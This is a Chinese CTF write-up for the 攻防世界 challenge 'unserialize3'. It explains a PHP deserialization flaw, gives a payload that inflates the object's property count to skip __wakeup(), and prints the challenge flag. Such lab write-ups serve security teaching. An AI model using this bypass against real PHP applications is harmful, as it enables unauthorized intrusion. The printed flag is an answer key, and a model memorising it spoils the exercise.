##[攻防世界]unserialize3题目wp

编程入门 行业动态 更新时间:2024-10-04 23:27:51

##[<a href=https://www.elefans.com/category/jswz/34/1765656.html style=攻防世界]unserialize3题目wp"/>

##[攻防世界]unserialize3题目wp

##[攻防世界]unserialize3题目wp

从题目我们可以看出,这道题是一道基础的php反序列化题。而进入网址后我们可以看到如下代码

class xctf
{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

通过简单的代码分析我们可以看出这个代码主要定义了一个变量,然后又对该变量进行了反序列化,并且输出“bad request”这一字符串。而底下的?code= 我们猜测应该是用于传递数据的接口。所以综合来看,我们首先应该对该题目所给出的变量进行序列化并通过?code=进行上传,所以先构造序列化变量O:4:"xctf":1:{s:4:"flag";s:3:"111";}并上传。

接下来,我们想要使php反序列化漏洞产生可以更改上传数据的属性值导致其反序列化异常,所以payload为

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";},上传得到flag为cyberpeace{494901f6eab656bdc53420dde73ef168}

53420dde73ef168}

更多推荐

##[攻防世界]unserialize3题目wp

本文发布于:2024-02-28 02:44:19,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1767336.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:攻防   题目   世界   wp

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!